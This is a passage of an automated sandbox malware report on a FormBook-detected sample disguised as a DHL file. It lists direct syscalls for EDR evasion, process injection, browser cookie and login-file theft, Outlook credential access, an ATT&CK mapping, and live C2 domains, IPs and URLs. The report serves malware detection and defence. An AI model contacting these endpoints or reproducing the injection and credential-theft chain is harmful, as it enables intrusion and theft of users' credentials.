                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A33616 mov eax, dword ptr fs:[00000030h]2_2_03A33616
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A33616 mov eax, dword ptr fs:[00000030h]2_2_03A33616
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]2_2_03A72619

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtQueryInformationProcess: Direct from: 0x77392C26Jump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtResumeThread: Direct from: 0x77392FBCJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtWriteVirtualMemory: Direct from: 0x7739490CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtCreateUserProcess: Direct from: 0x7739371CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtAllocateVirtualMemory: Direct from: 0x77392BFCJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtQuerySystemInformation: Direct from: 0x77392DFCJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtReadFile: Direct from: 0x77392ADCJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtDelayExecution: Direct from: 0x77392DDCJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtProtectVirtualMemory: Direct from: 0x77387B2EJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtWriteVirtualMemory: Direct from: 0x77392E3CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtCreateMutant: Direct from: 0x773935CCJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtResumeThread: Direct from: 0x773936ACJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtMapViewOfSection: Direct from: 0x77392D1CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtOpenKeyEx: Direct from: 0x77392B9CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtSetInformationProcess: Direct from: 0x77392C5CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtProtectVirtualMemory: Direct from: 0x77392F9CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtNotifyChangeKey: Direct from: 0x77393C2CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtQueryInformationToken: Direct from: 0x77392CACJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtCreateFile: Direct from: 0x77392FECJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtOpenFile: Direct from: 0x77392DCCJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtTerminateThread: Direct from: 0x77392FCCJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtDeviceIoControlFile: Direct from: 0x77392AECJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtAllocateVirtualMemory: Direct from: 0x77392BECJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtQuerySystemInformation: Direct from: 0x773948CCJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtQueryVolumeInformationFile: Direct from: 0x77392F2CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtAllocateVirtualMemory: Direct from: 0x773948ECJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtOpenSection: Direct from: 0x77392E0CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtAllocateVirtualMemory: Direct from: 0x77393C9CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtSetInformationThread: Direct from: 0x773863F9Jump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtClose: Direct from: 0x77392B6C
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtSetInformationThread: Direct from: 0x77392B4CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtReadVirtualMemory: Direct from: 0x77392E8CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtCreateKey: Direct from: 0x77392C6CJump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeNtQueryAttributesFile: Direct from: 0x77392E6CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\DHL_734825510.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread register set: target process: unknownJump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\regini.exeThread APC queued: target process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\DHL_734825510.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3090008Jump to behavior
                Source: C:\Users\user\Desktop\DHL_734825510.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL_734825510.exe"Jump to behavior
                Source: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: RsbLJIqaDYs.exe, 00000005.00000000.2575148913.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816729211.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000000.2733827779.0000000001331000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: RsbLJIqaDYs.exe, 00000005.00000000.2575148913.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816729211.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000000.2733827779.0000000001331000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: RsbLJIqaDYs.exe, 00000005.00000000.2575148913.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816729211.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000000.2733827779.0000000001331000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: RsbLJIqaDYs.exe, 00000005.00000000.2575148913.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000005.00000002.4816729211.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, RsbLJIqaDYs.exe, 00000007.00000000.2733827779.0000000001331000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2661754226.00000000094A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4817215327.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4817376568.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4817056266.0000000005200000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2656279373.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2661754226.00000000094A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4817215327.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4817376568.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4817056266.0000000005200000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2656279373.00000000065E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		2
                Virtualization/Sandbox Evasion                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		412
                Process Injection                		LSASS Memory2
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Abuse Elevation Control Mechanism                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
                Obfuscated Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing                		Cached Domain Credentials12
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570251 Sample: DHL_734825510.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 28 www.egyshare.xyz 2->28 30 www.egldfi.xyz 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 3 other signatures 2->50 10 DHL_734825510.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 RsbLJIqaDYs.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 regini.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 RsbLJIqaDYs.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 bloodbalancecaps.shop 108.179.253.197, 50022, 50023, 50024 UNIFIEDLAYER-AS-1US United States 22->34 36 samundri.online 84.32.84.32, 49721, 49722, 49723 NTT-LT-ASLT Lithuania 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                DHL_734825510.exe42%ReversingLabsWin32.Trojan.AutoitInject
                DHL_734825510.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.dating-apps-az-dn5.xyz/tskk/?BHptZ6F=o5GB+IawIAU5T0thXdQTAhCz8F67YQPQT/nwZCkciWz+LkCAD5WzKPOp+WFYKDZnS0ikteADWtOd2j97JYt8nhoktlw8l2JH1Fe3FVr0kJJ2WjNY2yZGKR8=&RZ=0nkpmZbx9Z4P20%Avira URL Cloudsafe
                http://www.samundri.online/3ifu/?BHptZ6F=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtR7263FvFtQ21l4S/sR8VHVbXOTd4oM=&RZ=0nkpmZbx9Z4P20%Avira URL Cloudsafe
                http://bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko60%Avira URL Cloudsafe
                http://www.appsolucao.shop/8mlm/100%Avira URL Cloudmalware
                http://www.egyshare.xyz/440l/?BHptZ6F=9t5r8PtstBUGfqpIeh5XnEiswD9luMiEeVsajtw7Z3dqDkGB8mLGChY9CqfKEaHyEvKJDzANYYXJmO8Xh0K1SfJD5xex/OhwsPZZ5DEaSUshfqY+26Bd8yM=&RZ=0nkpmZbx9Z4P20%Avira URL Cloudsafe
                http://www.t19yd.top/sa1b/?BHptZ6F=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/tmXBuLbW2sUc5PcpWY1XILnhN44V5I=&RZ=0nkpmZbx9Z4P20%Avira URL Cloudsafe
                http://www.egyshare.xyz/440l/0%Avira URL Cloudsafe
                http://www.ana-silverco.shop/ez1t/0%Avira URL Cloudsafe
                http://www.bloodbalancecaps.shop/qimy/0%Avira URL Cloudsafe
                http://www.atendefacil.info/gua3/?RZ=0nkpmZbx9Z4P2&BHptZ6F=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE3ew6u8Wba+OVKdJMXKWWGbfqYbjt0U=0%Avira URL Cloudsafe
                http://www.sitioseguro.blog/k4tn/0%Avira URL Cloudsafe
                http://www.happyjam.life/4ii9/0%Avira URL Cloudsafe
                http://www.sitioseguro.blog/k4tn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=UszxsXnyXaHrix4mOaqJD7vMyBmxMOeCUNKfuMYEqjdUerJZ7q+fEOQwPEbVbpTJrGRa9GB6/NRWLuSsaWPLUhjS0DDan+QLtyBM3L4kv6zOvH8nY/xHjUE=0%Avira URL Cloudsafe
                http://www.happyjam.life/4ii9/?RZ=0nkpmZbx9Z4P2&BHptZ6F=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74R/EcNhRi8s6fgxoYqpZFSK7yfL6tiw=0%Avira URL Cloudsafe
                http://www.whisperart.net/27s6/0%Avira URL Cloudsafe
                http://www.appsolucao.shop/8mlm/?BHptZ6F=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0XjsMpOmPR3vOajhWYhkzVz3w31CV1o=&RZ=0nkpmZbx9Z4P2100%Avira URL Cloudmalware
                http://www.ana-silverco.shop/ez1t/?BHptZ6F=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS4neSxI29SjRMg4iVPNQf+tma6zkIeo=&RZ=0nkpmZbx9Z4P20%Avira URL Cloudsafe
                http://www.bloodbalancecaps.shop0%Avira URL Cloudsafe
                http://www.samundri.online/3ifu/0%Avira URL Cloudsafe
                http://www.whisperart.net/27s6/?RZ=0nkpmZbx9Z4P2&BHptZ6F=3HPpqXJ7+KzZdUbztAJQoIdlDoC5J9hYXz+VcheInCeAf0Mmt05i/k62iF4aOsJa+VYW+vyKTPXBSx5msm7TgI/vrOYQcOVU79uPxUHt14iAAYzPN76r48s=0%Avira URL Cloudsafe
                http://www.atendefacil.info/gua3/0%Avira URL Cloudsafe
                http://www.t19yd.top/sa1b/0%Avira URL Cloudsafe
                http://www.bloodbalancecaps.shop/qimy/?RZ=0nkpmZbx9Z4P2&BHptZ6F=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq8B3cYE1WLpspuVk6wMXVtPZnEUyIhQ=0%Avira URL Cloudsafe
                http://www.remedies.pro/8ewn/?RZ=0nkpmZbx9Z4P2&BHptZ6F=MQU8hgqJCfJkKwurq5QXSTcsAScUHw3Ryuy9I29ewyrFHLJiO5EUJc8dhjLhkP1w+kMFiKX1Jf9ni3jKt1WG/ZpblKXuHNDxI7tmrBLFv1SmPdd+ShDH4FU=0%Avira URL Cloudsafe
                http://www.dating-apps-az-dn5.xyz/tskk/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.remedies.pro
                		13.248.169.48
                		truefalse
                  		high
                  www.whisperart.net
                  		199.59.243.227
                  		truetrue
                    		unknown
                    www.ana-silverco.shop
                    		104.21.90.137
                    		truefalse
                      		high
                      appsolucao.shop
                      		84.32.84.32
                      		truetrue
                        		unknown
                        samundri.online
                        		84.32.84.32
                        		truetrue
                          		unknown
                          www.dating-apps-az-dn5.xyz
                          		199.59.243.227
                          		truetrue
                            		unknown
                            www.sitioseguro.blog
                            		172.67.162.39
                            		truefalse
                              		high
                              www.egyshare.xyz
                              		13.248.169.48
                              		truetrue
                                		unknown
                                www.happyjam.life
                                		209.74.77.107
                                		truetrue
                                  		unknown
                                  bloodbalancecaps.shop
                                  		108.179.253.197
                                  		truetrue
                                    		unknown
                                    t19yd.top
                                    		38.47.207.164
                                    		truetrue
                                      		unknown
                                      www.atendefacil.info
                                      		208.115.225.220
                                      		truetrue
                                        		unknown
                                        www.bloodbalancecaps.shop
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.samundri.online
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.egldfi.xyz
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.t19yd.top
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.uynline.shop
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.betmatchx.online
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.appsolucao.shop
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.samundri.online/3ifu/?BHptZ6F=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtR7263FvFtQ21l4S/sR8VHVbXOTd4oM=&RZ=0nkpmZbx9Z4P2true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.egyshare.xyz/440l/true
